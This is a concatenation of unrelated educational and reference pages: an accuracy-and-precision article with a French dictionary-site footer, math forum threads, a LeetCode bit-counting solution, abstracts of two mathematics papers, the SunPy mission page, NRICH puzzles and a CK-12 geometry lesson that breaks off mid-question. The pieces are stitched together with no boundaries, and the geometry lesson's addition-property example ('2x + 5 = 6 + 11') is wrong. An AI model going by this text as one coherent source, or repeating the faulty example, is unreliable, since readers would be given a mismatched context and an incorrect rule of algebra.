variation arising when all efforts are made to keep conditions constant by using the same instrument and operator, and repeating during a short time period; and • Reproducibility — the variation arising using the same measurement process among different instruments and operators, and over longer time periods. ## Accuracy and precision in binary classification Accuracy is also used as a statistical measure of how well a binary classification test correctly identifies or excludes a condition. Condition (e.g., disease) As determined by Gold standard True False Testoutcome Positive True positive False positive → Positive predictive value Negative False negative True negative → Negative predictive value ↓Sensitivity ↓Specificity Accuracy That is, the accuracy is the proportion of true results (both true positives and true negatives) in the population. It is a parameter of the test. $\text{accuracy}=\frac{\text{number of true positives}+\text{number of true negatives}}{\text{numbers of true positives}+\text{false positives} + \text{false negatives} + \text{true negatives}}$ On the other hand, precision is defined as the proportion of the true positives against all the positive results (both true positives and false positives) $\text{precision}=\frac{\text{number of true positives}}{\text{number of true positives}+\text{false positives}}$ An accuracy of 100% means that the measured values are exactly the same as the given values. Also see Sensitivity and specificity. Accuracy may be determined from Sensitivity and Specificity, provided Prevalence is known, using the equation: $\text{accuracy}=(\text{sensitivity})(\text{prevalence}) + (\text{specificity})(1-\text{prevalence})$ The accuracy paradox for predictive analytics states that predictive models with a given level of accuracy may have greater predictive power than models with higher accuracy. It may be better to avoid the accuracy metric in favor of other metrics such as precision and recall. ## Accuracy and precision in psychometrics and psychophysics In psychometrics and psychophysics, the term accuracy is interchangeably used with validity and constant error. Precision is a synonym for reliability and variable error. The validity of a measurement instrument or psychological test is established through experiment or correlation with behavior. Reliability is established with a variety of statistical techniques, classically through an internal consistency test like Cronbach's alpha to ensure sets of related questions have related responses, and then comparison of those related question between reference and target population.[citation needed] ## Accuracy and precision in Logic Simulation In logic simulation, a common mistake in evaluation of accurate models is to compare a logic simulation model to a transistor circuit simulation model. This is a comparison of differences in precision, not accuracy. Precision is measured with respect to detail and accuracy is measured with respect to reality [2][3]. ## Accuracy and precision in information systems The concepts of accuracy and precision have also been studied in the context of data bases, information systems and their sociotechnical context. The necessary extension of these two concepts on the basis of theory of science suggests that they (as well as data quality and information quality) should be centered on accuracy defined as the closeness to the true value seen as the degree of agreement of readings or of calculated values of one same conceived entity, measured or calculated by different methods, in the context of maximum possible disagreement.[4] ## References 1. ^ John Robert Taylor (1999). An Introduction to Error Analysis: The Study of Uncertainties in Physical Measurements. University Science Books. pp. 128–129. ISBN 093570275X. 2. ^ John M. Acken, Encyclopedia of Computer Science and Technology, Vol 36, 1997, page 281-306 3. ^ 1990 Workshop on Logic-Level Modelling for ASICS, Mark Glasser, Rob Mathews, and John M. Acken, SIGDA Newsletter, Vol 20. Number 1, June 1990]] 4. ^ Ivanov, K. (1972). "Quality-control of information: On the concept of accuracy of information in data banks and in management information systems". The University of Stockholm and The Royal Institute of Technology. Doctoral dissertation. Further details are found in Ivanov, K. (1995). A subsystem in the design of informatics: Recalling an archetypal engineer. In B. Dahlbom (Ed.), The infological equation: Essays in honor of Börje Langefors, (pp. 287-301). Gothenburg: Gothenburg University, Dept. of Informatics (ISSN 1101-7422). Publicité ▼ Contenu de sensagent • définitions • synonymes • antonymes • encyclopédie • definition • synonym Publicité ▼ dictionnaire et traducteur pour sites web Alexandria Une fenêtre (pop-into) d'information (contenu principal de Sensagent) est invoquée un double-clic sur n'importe quel mot de votre page web. LA fenêtre fournit des explications et des traductions contextuelles, c'est-à-dire sans obliger votre visiteur à quitter votre page web ! Essayer ici, télécharger le code; Solution commerce électronique Augmenter le contenu de votre site Ajouter de nouveaux contenus Add à votre site depuis Sensagent par XML. Parcourir les produits et les annonces Obtenir des informations en XML pour filtrer le meilleur contenu. Indexer des images et définir des méta-données Fixer la signification de chaque méta-donnée (multilingue). Renseignements suite à un email de description de votre projet. Jeux de lettres Les jeux de lettre français sont : ○   Anagrammes ○   jokers, mots-croisés ○   Lettris ○   Boggle. Lettris Lettris est un jeu de lettres gravitationnelles proche de Tetris. Chaque lettre qui apparaît descend ; il faut placer les lettres de telle manière que des mots se forment (gauche, droit, haut et bas) et que de la place soit libérée. boggle Il s'agit en 3 minutes de trouver le plus grand nombre de mots possibles de trois lettres et plus dans une grille de 16 lettres. Il est aussi possible de jouer avec la grille de 25 cases. Les lettres doivent être adjacentes et les mots les plus longs sont les meilleurs. Participer au concours et enregistrer votre nom dans la liste de meilleurs joueurs ! Jouer Dictionnaire de la langue française Principales Références La plupart des définitions du français sont proposées par SenseGates et comportent un approfondissement avec Littré et plusieurs auteurs techniques spécialisés. Le dictionnaire des synonymes est surtout dérivé du dictionnaire intégral (TID). L'encyclopédie française bénéficie de la licence Wikipedia (GNU). Changer la langue cible pour obtenir des traductions. Astuce: parcourir les champs sémantiques du dictionnaire analogique en plusieurs langues pour mieux apprendre avec sensagent. 5998 visiteurs en ligne calculé en 0,078s Je voudrais signaler : section : une faute d'orthographe ou de grammaire un contenu abusif (raciste, pornographique, diffamatoire)
# Definition of Pie Chart or Pie Graph A Pie Chart (or Pie Graph) uses sectors of a circle to represent data. The data is broken up into categories, depending on responses to a question. The size of each sector shows what proportion of the data is in each category. In the example, the pie chart displays the proportions of the total number of scouts attending a district camp who come from each scout group in the district. ### Description The aim of this dictionary is to provide definitions to common mathematical terms. Students learn a new math skill every week at school, sometimes just before they start a new skill, if they want to look at what a specific term means, this is where this dictionary will become handy and a go-to guide for a student. ### Audience Year 1 to Year 12 students ### Learning Objectives Learn common math terms starting with letter P Author: Subject Coach Added on: 6th Feb 2018 You must be logged in as Student to ask a Question. None just yet!
# Math Help - Gauss bonnet theorem 1. ## Gauss bonnet theorem For this surface M, I guess I need to show M has no boundary, and find the euler characterstic of M. How to do this? 2. ## Re: Gauss bonnet theorem You can show that M is homeomorphic to S^2 so it has no boundary and its Euler character is 2. To show that M is homeomorphic to S^2={(x,y,z)|x^2+y^2+z^2=1}, define a map: f: M -> S^2 by f(p) = p/|p| and try to show that f is a homeomorphism( actually it is a diffeomorphism). 3. ## Re: Gauss bonnet theorem Ok thanks, so the total curvature is 2 x 2pi=4pi. What about (ii) 4. ## Re: Gauss bonnet theorem (ii) is a direct application of the theorem. -4 pi = 2 pi X, so X=-2. It is a double torus.
# Why does y=cot(theta) have zeros at the points where y=tan(theta) has asymptotes y=tan(theta) has an asymptote when theta= pi/2 because 1/0 is undefined, and the Taylor Series for tan approaching this point just goes on indefinitely I'm guessing (I'm in gr 11 so I'm new to all this). When reciprocating tan, how and why are we allowed to reciprocate 1/0. I'm sure there's rules math rules behind reciprocating fractions when dividing. Can someone maybe offer 1) a proof of why reciprocating a fraction when dividing, turning it into multiplication works. 2) If it isn't already clear from the answer to 1), could you explain what allows us to reciprocate 1/0 to 0/1 when converting tan to cot. when reciprocating something don't we also set restrictions to the denominator. but even then, is tan(theta) the initial function we are setting restrictions on or is cot(theta) the initial function? What I think might be the answer is that cot is only the inverse of tan when tan or cot has the restriction that theta cannot equal n*(pi/2) where {nEZ}. And in cases where theta is n*(pi/2) where {nEZ}, cot and tan are not the reciprocal of each other. My teacher insists on using circular arguments, so im stuck • $\cot\theta = 1/\tan\theta$. – amd Apr 22 '19 at 21:58 • Please use MathJax to format your posts. They'll be a lot easier to read. – saulspatz Apr 22 '19 at 22:32 The best way to look at this is geometrically. Picture a unit circle in the $$x,y$$ plane centered at the origin and let point $$A$$ be at $$(1,0)$$. Now draw point $$P$$ on the circle and let $$P$$ wander along the circle in such a way that at any given time, angle $$AOP$$ is $$\theta$$. Drop perpendiculars to the $$x$$ and $$y$$ axes from $$p$$; let their (signed) lengths be $$X$$ and $$Y$$. In this geometric picture, the function $$\tan \theta$$ can be viewed as the ratio $$Y/X$$ provided $$P$$ is not on the $$y$$ axis. We don't try to define $$\tan \theta$$ when $$P$$ is on the $$y$$ axis, because we want to stay away from dividing by zero. Similarly, the function $$\cot \theta$$ can be viewed as the ratio $$X/Y$$ provided $$P$$ is not on the $$x$$ axis. Again, we avoid division by zero. Then the fundamental relation holds everywhere that cotangent and tangent can both be defined: $$\cot \theta = \frac1{\tan \theta}$$ Now we look at how a plot of $$\tan \theta$$ on a graph, with $$\theta$$ as the left-right coordinate and $$\tan \theta$$ as the vertical coordinate. As we approach the "forbidden" point the value gets greater and greater without limit; we say it "approaches infinity" and we note that it gets closer and closer to the vertical line $$x = 90^\circ$$. It is not a coincidence that at than same value of $$\theta$$, $$\cot \theta = 0$$, because of necessity it will get arbitrarily small as $$\tan \theta$$ gets arbitrarily large. But we can't, without a good deal more care than you would be able to give at your level, blithely say that "$$1/\infty = 0$$" or "$$1/0 = +\infty$$". That works out fine in this case but it would be a bad habit to get into because it can lead to manipulations which give wrong answers in other cases.
LeetCode 第 191 题 (Number of 1 Bits) Write a function that takes an unsigned integer and returns the number of ’1’ bits it has (also known as the Hamming weight). For example, the 32-bit integer ’11’ has binary representation 00000000000000000000000000001011, so the function should return 3. class Solution { public: int hammingWeight(uint32_t n) { int count = 0; uint32_t test_bit = 1; for(int i = 0; i < 32; i++) { if(test_bit & n) count ++; test_bit = test_bit << 1; } return count; } }; • 广告 • 抄袭 • 版权 • 政治 • 色情 • 无意义 • 其他 120
# Cauchy sequence/Definition Given a metric space [ilmath](X,d)[/ilmath] and a sequence [ilmath](x_n)_{n=1}^\infty\subseteq X[/ilmath] is said to be a Cauchy sequence[1][2] if: • [ilmath]\forall\epsilon > 0\exists N\in\mathbb{N}\forall n,m\in\mathbb{N}[n\ge m> N\implies d(x_m,x_n)<\epsilon][/ilmath][Note 1][Note 2] In words it is simply: • For any arbitrary distance apart, there exists a point such that any two points in the sequence after that point are within that arbitrary distance apart. ## Notes 1. Note that in Krzysztof Maurin's notation this is written as $\bigwedge_{\epsilon>0}\bigvee_{N\in\mathbb{N} }\bigwedge_{m,n>\mathbb{N} }d(x_n,x_m)<\epsilon$ - which is rather elegant 2. It doesn't matter if we use [ilmath]n\ge m>N[/ilmath] or [ilmath]n,m\ge N[/ilmath] because if [ilmath]n=m[/ilmath] then [ilmath]d(x_n,x_m)=0[/ilmath], it doesn't matter which way we consider them (as [ilmath]n>m[/ilmath] or [ilmath]m>n[/ilmath]) for [ilmath]d(x,y)=d(y,x)[/ilmath] - I use the ordering to give the impression that as [ilmath]n[/ilmath] goes out ahead it never ventures far (as in [ilmath]\epsilon[/ilmath]-distance}}) from [ilmath]x_m[/ilmath]. This has served me well ## References 1. Functional Analysis - George Bachman and Lawrence Narici 2. Analysis - Part 1: Elements - Krzysztof Maurin
MATLIS INJECTIVE MODULES Title & Authors MATLIS INJECTIVE MODULES Yan, Hangyu; Abstract In this paper, Matlis injective modules are introduced and studied. It is shown that every R-module has a (special) Matlis injective preenvelope over any ring R and every right R-module has a Matlis injective envelope when R is a right Noetherian ring. Moreover, it is shown that every right R-module has an $\small{{\mathcal{F}}^{{\perp}1}}$-envelope when R is a right Noetherian ring and $\small{\mathcal{F}}$ is a class of injective right R-modules. Keywords Matlis injective module;(pre)envelope;$\small{{\sum}}$-pure injective; Language English Cited by 1. Relative Projective and Injective Dimensions, Communications in Algebra, 2016, 44, 8, 3383 References 1. F. W. Anderson and K. R. Fuller, Rings and Categories of Modules, Grad. Texts in Math. 13, Springer-Verlag, New York 1974. 2. S. Bazzoni, When are definable classes tilting and cotilting classes?, J. Algebra 320 (2008), no. 12, 4281-4299. 3. H. Cartan and S. Eilenberg, Homological Algebra, Princeton Math. Ser., 1956. 4. P. C. Eklof and S. Shelah, On Whitehead modules, J. Algebra 142 (1991), no. 2, 492-510. 5. P. C. Eklof and J. Trlifaj, How to make Ext vanish, Bull. Lond. Math. Soc. 23 (2001), no. 1, 41-51. 6. E. E. Enochs, Injective and flat covers, envelopes and resolvents, Israel J. Math. 39 (1981), no. 3, 189-209. 7. E. E. Enochs and O. M. G. Jenda, Copure injective modules, Quaest. Math. 14 (1991), no. 4, 401-409. 8. E. E. Enochs and O. M. G. Jenda, Relative Homological Algebra, de Gruyter Expos. Math. 30, de Gruyter, Berlin 2000. 9. A. Facchini, Module Theory: Endomorphism Rings and Direct Sum Decompositions in Some Classes of Modules, Progress in Math. vol. 167, Birkhauser, Basel, 1998. 10. R. Gobel and J. Trlifaj, Approximations and Endomorphism Algebras of Modules, de Gruyter Expos. Math. 41, de Gruyter, Berlin 2006. 11. P. A. Guil Asensio and I. Herzog, Sigma-cotorsion rings, Adv. Math. 191 (2005), no. 1, 11-28. 12. T. Y. Lam, Lectures on Modules and Rings, Grad. Texts in Math. 189, Springer, New York 1999. 13. J. J. Rotman, An Introduction to Homological Algebra, Pure Appl. Math. 85, Academic Press, New York 1979.
# Our Mission¶ SunPy is a community-developed free and open-source software package for solar physics. It aims to be provide a comprehensive data analysis environment that allows researchers within the field of solar physics to carry out their tasks with the minimal effort. SunPy is written using the Python programming language and is build upon the scientific Python environment which includes several core packages such as NumPy, SciPy, Matplotlib and Pandas. Since SunPy deals with key astrophysical concepts, its development is closely associated with that of Astropy, which is a fundamental package within the Python astronomy ecosystem. The SunPy package was established on the 28th of March 2011 by a small group of scientists and developers at the NASA Goddard Space Flight Center. Since that time, SunPy have grown from this small group into large community python package. Furthermore, the SunPy project was established in order to further the goals of the SunPy package. The SunPy project (also known as the Sunpy organization)wants to provide the software tools necessary so that anyone can analyze the ever increasing catalogue of solar data. This enables the targeted support of other solar physics Python packages that do not fall within the scope of the core SunPy package. We are proud to be a NUMFocus sponsored project and have been supported by ESA, PSF and Google to name a few. SunPy has become a global project that is not associated with any individual institution. More information about the SunPy project can be find The Project. # Code of Conduct¶ We have a Code of Conduct, which we expect everyone to follow. ## Acknowledging or Citing SunPy¶ If you have used SunPy in your scientific work we would appreciate it if you would acknowledge it. The continued growth and development of SunPy is dependent on the community being aware of SunPy. # Publications¶ This research has made use of SunPy vX.Y, an open-source and free community-developed solar data analysis Python package (citation). The citation should be to the SunPy paper and the version number should cite the Zenodo DOI for the version used in your work. @ARTICLE{2015CS&D....8a4009S, author = {{SunPy Community}, T. and {Mumford}, S.~J. and {Christe}, S. and {P{\'e}rez-Su{\'a}rez}, D. and {Ireland}, J. and {Shih}, A.~Y. and {Inglis}, A.~R. and {Liedtke}, S. and {Hewett}, R.~J. and {Mayer}, F. and {Hughitt}, K. and {Freij}, N. and {Meszaros}, T. and {Bennett}, S.~M. and {Malocha}, M. and {Evans}, J. and {Agrawal}, A. and {Leonard}, A.~J. and {Robitaille}, T.~P. and {Mampaey}, B. and {Iv{\'a}n Campos-Rozo}, J. and {Kirk}, M.~S.}, title = "{SunPy{\mdash}Python for solar physics}", journal = {Computational Science and Discovery}, archivePrefix = "arXiv", eprint = {1505.02563}, primaryClass = "astro-ph.IM", year = 2015, month = jan, volume = 8, number = 1, eid = {014009}, pages = {014009}, doi = {10.1088/1749-4699/8/1/014009},
Sharp upper bounds for a singular perturbation problem related to micromagnetics Annali della Scuola Normale Superiore di Pisa - Classe di Scienze, Série 5, Tome 6 (2007) no. 4, p. 673-701 We construct an upper bound for the following family of functionals ${\left\{{E}_{\epsilon }\right\}}_{\epsilon >0}$, which arises in the study of micromagnetics: ${E}_{\epsilon }\left(u\right)={\int }_{\Omega }{\epsilon |\nabla u|}^{2}+\frac{1}{\epsilon }{\int }_{{ℝ}^{2}}{|{H}_{u}|}^{2}.$ Here $\Omega$ is a bounded domain in ${ℝ}^{2}$, $u\in {H}^{1}\left(\Omega ,{S}^{1}\right)$ (corresponding to the magnetization) and ${H}_{u}$, the demagnetizing field created by $u$, is given by $\left\{\begin{array}{cc}\mathrm{div}\phantom{\rule{0.166667em}{0ex}}\left(\stackrel{˜}{u}+{H}_{u}\right)=0\phantom{\rule{1em}{0ex}}\hfill & \text{in}\phantom{\rule{4pt}{0ex}}{ℝ}^{2}\phantom{\rule{0.166667em}{0ex}},\hfill \\ \mathrm{curl}\phantom{\rule{0.166667em}{0ex}}{H}_{u}=0\phantom{\rule{1em}{0ex}}\phantom{\rule{1em}{0ex}}\phantom{\rule{1em}{0ex}}\hfill & \phantom{\rule{4pt}{0ex}}\text{in}\phantom{\rule{4pt}{0ex}}{ℝ}^{2}\phantom{\rule{0.166667em}{0ex}},\hfill \end{array}\right\$ where $\stackrel{˜}{u}$ is the extension of $u$ by $0$ in ${ℝ}^{2}\setminus \Omega$. Our upper bound coincides with the lower bound obtained by Rivière and Serfaty. Classification:  49J45,  35B25,  35J20 @article{ASNSP_2007_5_6_4_673_0, author = {Poliakovsky, Arkady}, title = {Sharp upper bounds for a singular perturbation problem related to micromagnetics}, journal = {Annali della Scuola Normale Superiore di Pisa - Classe di Scienze}, publisher = {Scuola Normale Superiore, Pisa}, volume = {Ser. 5, 6}, number = {4}, year = {2007}, pages = {673-701}, zbl = {1150.49006}, mrnumber = {2394415}, language = {en}, url = {http://www.numdam.org/item/ASNSP_2007_5_6_4_673_0} } Poliakovsky, Arkady. Sharp upper bounds for a singular perturbation problem related to micromagnetics. Annali della Scuola Normale Superiore di Pisa - Classe di Scienze, Série 5, Tome 6 (2007) no. 4, pp. 673-701. http://www.numdam.org/item/ASNSP_2007_5_6_4_673_0/ [1] L. Ambrosio, C. De Lellis and C. Mantegazza, Line energies for gradient vector fields in the plane, Calc. Var. Partial Differential Equations 9 (1999), 327-355. | MR 1731470 | Zbl 0960.49013 [2] L. Ambrosio, N. Fusco and D. Pallara, “Functions of Bounded Variation and Free Discontinuity Problems”, Oxford Mathematical Monographs, Oxford University Press, New York, 2000. | MR 1857292 | Zbl 0957.49001 [3] P. Aviles and Y. Giga, A mathematical problem related to the physical theory of liquid crystal configurations, Proc. Centre Math. Anal. Austral. Nat. Univ. 12 (1987), 1-16. | MR 924423 [4] P. Aviles and Y. Giga, On lower semicontinuity of a defect energy obtained by a singular limit of the Ginzburg-Landau type energy for gradient fields, Proc. Roy. Soc. Edinburgh Sect. A 129 (1999), 1-17. | MR 1669225 | Zbl 0923.49008 [5] S. Conti and C. De Lellis, Sharp upper bounds for a variational problem with singular perturbation, Math. Ann. 338 (2007), 119-146. | MR 2295507 | Zbl 1186.49004 [6] J. Dávila and R. Ignat, Lifting of $BV$ functions with values in ${S}^{1}$, C. R. Math. Acad. Sci. Paris 337 (2003) 159-164. | MR 2001127 | Zbl 1046.46026 [7] C. De Lellis, An example in the gradient theory of phase transitions ESAIM Control Optim. Calc. Var. 7 (2002), 285-289 (electronic). | Numdam | MR 1925030 | Zbl 1037.49010 [8] A. Desimone, S. Müller, R. V. Kohn and F. Otto, A compactness result in the gradient theory of phase transitions, Proc. Roy. Soc. Edinburgh Sect. A 131 (2001), 833-844. | MR 1854999 | Zbl 0986.49009 [9] N. M. Ercolani, R. Indik, A. C. Newell and T. Passot, The geometry of the phase diffusion equation, J. Nonlinear Sci. 10 (2000), 223-274. | MR 1743400 | Zbl 0981.76087 [10] L. C. Evans, “Partial Differential Equations”, Graduate Studies in Mathematics, Vol. 19, American Mathematical Society, 1998. | MR 2597943 | Zbl 0902.35002 [11] L. C. Evans and R. F. Gariepy, “Measure Theory and Fine Properties of Functions”, Studies in Advanced Mathematics, CRC Press, Boca Raton, FL, 1992. | MR 1158660 | Zbl 0804.28001 [12] D. Gilbarg and N. Trudinger, “Elliptic Partial Differential Equations of Elliptic Type”, 2nd ed., Springer-Verlag, Berlin-Heidelberg, 1983. | MR 737190 | Zbl 0198.14101 [13] E. Giusti, “Minimal Surfaces and Functions of Bounded Variation”, Monographs in Mathematics, Vol. 80, Birkhäuser Verlag, Basel, 1984. | MR 775682 | Zbl 0545.49018 [14] W. Jin and R.V. Kohn, Singular perturbation and the energy of folds, J. Nonlinear Sci. 10 (2000), 355-390. | MR 1752602 | Zbl 0973.49009 [15] A. Poliakovsky, A method for establishing upper bounds for singular perturbation problems, C. R. Math. Acad. Sci. Paris 341 (2005), 97-102. | MR 2153964 | Zbl 1068.49009 [16] A. Poliakovsky, Upper bounds for singular perturbation problems involving gradient fields, J. Eur. Math. Soc. 9 (2007), 1-43. | MR 2283101 | Zbl 1241.49011 [17] A. Poliakovsky, A general technique to prove upper bounds for singular perturbation problems, submitted to Journal d'Analyse. | Zbl 1153.49018 [18] T. Rivière and S. Serfaty, Limiting domain wall energy for a problem related to micromagnetics, Comm. Pure Appl. Math. 54 (2001), 294-338. | MR 1809740 | Zbl 1031.35142 [19] T. Rivière and S. Serfaty, Compactness, kinetic formulation and entropies for a problem related to mocromagnetics, Comm. Partial Differential Equations 28 (2003), 249-269. | MR 1974456 | Zbl 1094.35125 [20] A. I. Volpert and S. I. Hudjaev, “Analysis in Classes of Discontinuous Functions and Equations of Mathematical Physics”, Martinus Nijhoff Publishers, Dordrecht, 1985. | MR 785938 | Zbl 0564.46025
### Ab Surd Ity Find the value of sqrt(2+sqrt3)-sqrt(2-sqrt3)and then of cuberoot(2+sqrt5)+cuberoot(2-sqrt5). ### Em'power'ed Find the smallest numbers a, b, and c such that: a^2 = 2b^3 = 3c^5 What can you say about other solutions to this problem? ### Route to Root A sequence of numbers x1, x2, x3, ... starts with x1 = 2, and, if you know any term xn, you can find the next term xn+1 using the formula: xn+1 = (xn + 3/xn)/2 . Calculate the first six terms of this sequence. What do you notice? Calculate a few more terms and find the squares of the terms. Can you prove that the special property you notice about this sequence will apply to all the later terms of the sequence? Write down a formula to give an approximation to the cube root of a number and test it for the cube root of 3 and the cube root of 8. How many terms of the sequence do you have to take before you get the cube root of 8 correct to as many decimal places as your calculator will give? What happens when you try this method for fourth roots or fifth roots etc.? # Weekly Challenge 16: Archimedes Numerical Roots ##### Stage: 5 Challenge Level: A sequence of numbers $x_1, x_2, x_3, ... ,$ starts with $x_1 = 2$, and, if you know any term $x_n$, you can find the next term $x_{n+1}$ using the formula $x_{n+1} = \frac{1}{2} \left( x_n + \frac{3}{x_n} \right)$.
<img src="https://d5nxst8fruw4z.cloudfront.net/atrk.gif?account=iA1Pi1a8Dy00ym" style="display:none" height="1" width="1" alt="" /> You are reading an older version of this FlexBook® textbook: CK-12 Geometry - Second Edition Go to the latest version. 2.4: Algebraic and Congruence Properties Difficulty Level: At Grade Created by: CK-12 Learning Objectives • Understand basic properties of equality and congruence. • Solve equations and justify each step in the solution. • Use a 2-column format to prove theorems. Review Queue Solve the following problems. 1. Explain how you would solve $2x-3=9$. 2. If two angles are a linear pair, they are supplementary. If two angles are supplementary, their sum is $180^\circ$. What can you conclude? By which law? 3. Draw a picture with the following: $\angle LMN \ \text{is bisected by}\ \overline{MO} \qquad \qquad \overline{LM} \cong \overline{MP}\!\\\angle OMP \ \text{is bisected by}\ \overline{MN} \qquad \qquad N \ \text{is the midpoint of}\ \overline{MQ}$ Know What? Three identical triplets are sitting next to each other. The oldest is Sara and she always tells the truth. The next oldest is Sue and she always lies. Sally is the youngest of the three. She sometimes lies and sometimes tells the truth. Scott came over one day and didn't know who was who, so he asked each of them one question. Scott asked the sister that was sitting on the left, “Which sister is in the middle?” and the answer he received was, “That's Sara.” Scott then asked the sister in the middle, “What is your name?” The response given was, “I'm Sally.” Scott turned to the sister on the right and asked, “Who is in the middle?” The sister then replied, “She is Sue.” Who was who? Properties of Equality Recall from Chapter 1 that the = sign and the word “equality” are used with numbers. The basic properties of equality were introduced to you in Algebra I. Here they are again: For all real numbers $a, b$, and $c$: Examples Reflexive Property of Equality $a = a$ $25 = 25$ Symmetric Property of Equality $a = b$ and $b = a$ $m \angle P = 90^\circ$ or $90^\circ = m \angle P$ Transitive Property of Equality $a = b$ and $b = c$, then $a = c$ $a + 4 = 10$ and $10 = 6 + 4$, then $a + 4 = 6 + 4$ Substitution Property of Equality If $a = b$, then $b$ can be used in place of $a$ and vise versa. If $a = 9$ and $a - c = 5$, then $9 - c = 5$ Addition Property of Equality If $a = b$, then $a + c = b + c$. If $2x = 6$, then $2x + 5 = 6 + 11$ Subtraction Property of Equality If $a = b$, then $a - c = b - c$. If $m \angle x + 15^\circ = 65^\circ$, then $m \angle x+15^\circ-15^\circ=65^\circ-15^\circ$ Multiplication Property of Equality If $a = b$, then $ac = bc$. If $y = 8$, then $5 \cdot y=5 \cdot 8$ Division Property of Equality If $a = b$, then $\frac{a}{c}=\frac{b}{c}$. If $3b=18$, then $\frac{3b}{3}=\frac{18}{3}$ Distributive Property $a(b+c)=ab+ac$ $5(2x-7)=5(2x)-5(7)=10x-35$ Properties of Congruence Recall that $\overline{AB} \cong \overline{CD}$ if and only if $AB = CD$. $\overline{AB}$ and $\overline{CD}$ represent segments, while $AB$ and $CD$ are lengths of those segments, which means that $AB$ and $CD$ are numbers. The properties of equality apply to $AB$ and $CD$. This also holds true for angles and their measures. $\angle ABC \cong \angle DEF$ if and only if $m \angle ABC = m \angle DEF$. Therefore, the properties of equality apply to $m \angle ABC$ and $m \angle DEF$. Just like the properties of equality, there are properties of congruence. These properties hold for figures and shapes. For Line Segments For Angles Reflexive Property of Congruence $\overline{AB} \cong \overline{AB}$ $\angle ABC \cong \angle CBA$ Symmetric Property of Congruence If $\overline{AB} \cong \overline{CD}$, then $\overline{CD} \cong \overline{AB}$ If $\angle ABC \cong \angle DEF$, then $\angle DEF \cong \angle ABC$ Transitive Property of Congruence If $\overline{AB} \cong \overline{CD}$ and $\overline{CD} \cong \overline{EF}$, then $\overline{AB} \cong \overline{EF}$ If $\angle ABC \cong \angle DEF$ and $\angle DEF \cong \angle GHI$, then $\angle ABC \cong \angle GHI$ Using Properties of Equality with Equations When you solve equations in algebra you use properties of equality. You might not write out the logical justification for each step in your solution, but you should know that there is an equality property that justifies that step. We will abbreviate “Property of Equality” “PoE” and “Property of Congruence” “PoC.” Example 1: Solve $2(3x-4)+11=x-27$ and justify each step. Solution: $2(3x-4)+11 &= x-27\\6x-8+11 &= x-27 && \text{Distributive Property}\\6x+3 &= x-27 && \text{Combine like terms}\\6x+3-3 &= x-27-3 && \text{Subtraction PoE}\\6x &= x-30 && \text{Simplify}\\6x-x &= x-x-30 && \text{Subtraction PoE}\\5x &= -30 && \text{Simplify}\\\frac{5x}{5} &= \frac{-30}{5} && \text{Division PoE}\\x &= -6 && \text{Simplify}$ Example 2: Given points $A, B$, and $C$, with $AB = 8, BC = 17$, and $AC = 20$. Are $A, B$, and $C$ collinear? Solution: Set up an equation using the Segment Addition Postulate. $AB + BC &= AC && \text{Segment Addition Postulate}\\8 + 17 &= 20 && \text{Substitution PoE}\\25 & \neq 20 && \text{Combine like terms}$ Because the two sides are not equal, $A, B$ and $C$ are not collinear. Example 3: If $m \angle A+m \angle B=100^\circ$ and $m \angle B = 40^\circ$, prove that $\angle A$ is an acute angle. Solution: We will use a 2-column format, with statements in one column and their corresponding reasons in the next. This is formally called a 2-column proof. Statement Reason 1. $m \angle A+m \angle B=100^\circ$ and $m \angle B = 40^\circ$ Given (always the reason for using facts that are told to us in the problem) 2. $m \angle A+40^\circ=100^\circ$ Substitution PoE 3. $m \angle A = 60^\circ$ Subtraction PoE 4. $\angle A$ is an acute angle Definition of an acute angle, $m \angle A < 90^\circ$ Two-Column Proof Example 4: Write a two-column proof for the following: If $A, B, C$, and $D$ are points on a line, in the given order, and $AB = CD$, then $AC = BD$. Solution: First of all, when the statement is given in this way, the “if” part is the given and the “then” part is what we are trying to prove. Plot the points in the order $A, B, C, D$ on a line. Add the corresponding markings, $AB = CD$, to the line. Draw the 2-column proof and start with the given information. From there, we can use deductive reasoning to reach the next statement and what we want to prove. Reasons will be definitions, postulates, properties and previously proven theorems. Statement Reason 1. $A, B, C$, and $D$ are collinear, in that order. Given 2. $AB = CD$ Given 3. $BC = BC$ Reflexive PoE 4. $AB + BC = BC + CD$ Addition PoE 5. $AB + BC = AC\!\\BC + CD = BD$ Segment Addition Postulate 6. $AC = BD$ Substitution or Transitive PoE When you reach what it is that you wanted to prove, you are done. Prove Move: (A subsection that will help you with proofs throughout the book.) When completing a proof, a few things to keep in mind: • Number each step. • Statements with the same reason can (or cannot) be combined into one step. It is up to you. For example, steps 1 and 2 above could have been one step. And, in step 5, the two statements could have been written separately. • Draw a picture and mark it with the given information. • You must have a reason for EVERY statement. • The order of the statements in the proof is not fixed. For example, steps 3, 4, and 5 could have been interchanged and it would still make sense. Example 5: Write a two-column proof. Given: $\overrightarrow{BF}$ bisects $\angle ABC$; $\angle ABD \cong \angle CBE$ Prove: $\angle DBF \cong \angle EBF$ Solution: First, put the appropriate markings on the picture. Recall, that bisect means “to cut in half.” Therefore, if $\overrightarrow{BF}$ bisects $\angle ABC$, then $m \angle ABF=m \angle FBC$. Also, because the word “bisect” was used in the given, the definition will probably be used in the proof. Statement Reason 1. $\overrightarrow{BF}$ bisects $\angle ABC, \angle ABD \cong \angle CBE$ Given 2. $m \angle ABF=m \angle FBC$ Definition of an Angle Bisector 3. $m \angle ABD=m \angle CBE$ If angles are $\cong$, then their measures are equal. 4. $m \angle ABF=m \angle ABD+m \angle DBF\!\\m \angle FBC=m \angle EBF+m \angle CBE$ Angle Addition Postulate 5. $m \angle ABD+m \angle DBF=m \angle EBF+m \angle CBE$ Substitution PoE 6. $m \angle ABD+m \angle DBF=m \angle EBF+m \angle ABD$ Substitution PoE 7. $m \angle DBF=m \angle EBF$ Subtraction PoE 8. $\angle DBF \cong \angle EBF$ If measures are equal, the angles are $\cong$. Prove Move: Use symbols and abbreviations for words within proofs. For example, $\cong$ was used in place of the word congruent above. You could also use $\angle$ for the word angle. Know What? Revisited The sisters, in order are: Sally, Sue, Sara. The sister on the left couldn’t have been Sara because that sister lied. The middle one could not be Sara for the same reason. So, the sister on the right must be Sara, which means she told Scott the truth and Sue is in the middle, leaving Sally to be the sister on the left. Review Questions For questions 1-8, solve each equation and justify each step. 1. $3x+11=-16$ 2. $7x-3=3x-35$ 3. $\frac{2}{3} g+1=19$ 4. $\frac{1}{2} MN=5$ 5. $5m \angle ABC=540^\circ$ 6. $10b-2(b+3)=5b$ 7. $\frac{1}{4}y+\frac{5}{6}=\frac{1}{3}$ 8. $\frac{1}{4}AB+\frac{1}{3}AB=12+\frac{1}{2}AB$ For questions 9-14, use the given property or properties of equality to fill in the 